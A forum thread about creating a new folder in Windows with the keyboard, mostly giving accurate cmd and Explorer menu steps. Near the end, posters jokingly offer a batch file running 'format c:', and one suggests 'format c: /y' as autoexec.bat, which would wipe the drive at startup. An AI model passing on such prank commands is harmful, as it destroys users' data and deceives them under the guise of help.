more detail....

windows key + R
type 'cmd'
navigate to where you want the folders - cd programfiles etc etc.
type 'mkdir xxxxxxx'
that will make dir xxxxxxx

Alternatively,
Windows key + E
navigate to correct folder using cursors and space bar
Alt + F
Cursor Right
enter/return
type name of dir

There is no single command for a New Folder via keyboard, but common sense nav will do it. (assuming you are in Windows Explorer)

ALT-F (Opens FILE menu)
Down Arrow to NEW
ENTER to next menu
ENTER to Folder
ENTER to create.

Good Luck.

Several helpful members have posted exactly what you need to do in order to do what you are asking. There is no single keyboard function to create new folders in Windows. Allanv's instructions are the quickest shortcut you can use to create a folder without using the mouse. Press Alt and f together to open the File menu, then press w to open the "new item" menu, then press f to create a new folder, then type the name of the new folder and press Enter to save the name.

Or, you can do it the easy way and right-click with the mouse in the Explorer window and select New>Folder.

Without a third-party application that lets you map single keyboard keys to complex functions, there is no easier way to do it than what has already been posted.

edit: typo

Ok, we fell for it.

****DO NOT TRY THE FOLLOWING AT HOME****

Anyway, the real way to do it is to make a batch file:

format c:

save it as file.bat in your root file
Restart your computer.

****Don't do it - he's not worth it****

Since you apparently don't want any real, honest, good advice, you might as well follow Montag's instructions, but you'll get better results if you name the file autoexec.bat and make the text within the file format c: /y.
